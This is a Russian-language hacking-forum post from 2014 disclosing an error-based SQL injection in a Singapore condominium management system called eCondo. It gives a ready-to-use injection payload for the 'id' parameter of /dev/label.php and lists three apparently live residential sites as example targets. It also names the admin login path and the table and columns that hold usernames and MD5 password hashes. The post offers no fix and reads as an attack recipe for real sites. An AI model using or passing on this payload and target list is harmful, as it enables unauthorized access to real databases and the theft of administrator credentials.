Тема: Энциклопедия уязвимых скриптов
Показать сообщение отдельно

  #504  
Старый 25.03.2014, 13:07
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию
Condominium Management SystemeCondo

Сингапурская контора.

Официальный сайт http://www.econdo.com.sg/

SQL Injection

Уязвимый сценарий: /dev/label.php

Уязвимый параметр:id

Вектор: error-based

Exploit:[site/dev/label.php?id=1 or(SELECT 1 from information_schema.tables group by concat((SELECT{YOUR REQUEST}),floor(rand(0)*2))having max(0)) --]

Примеры:

Цитата:
Сообщение от None  
http://www.compassheights.com.sg/dev/label.php?id=15
http://rosewoodsuites.com.sg/dev/label.php?id=2
http://www.dakotaresidences.net/dev/label.php?id=14
Панель администратора: site/dev/login.php

MD5-хэши паролей и имена пользователей наxодятся в таблице dev_user, имена колонок соответственноdev_pword и dev_user_name.

Исходники не нашел.
 
Ответить с цитированием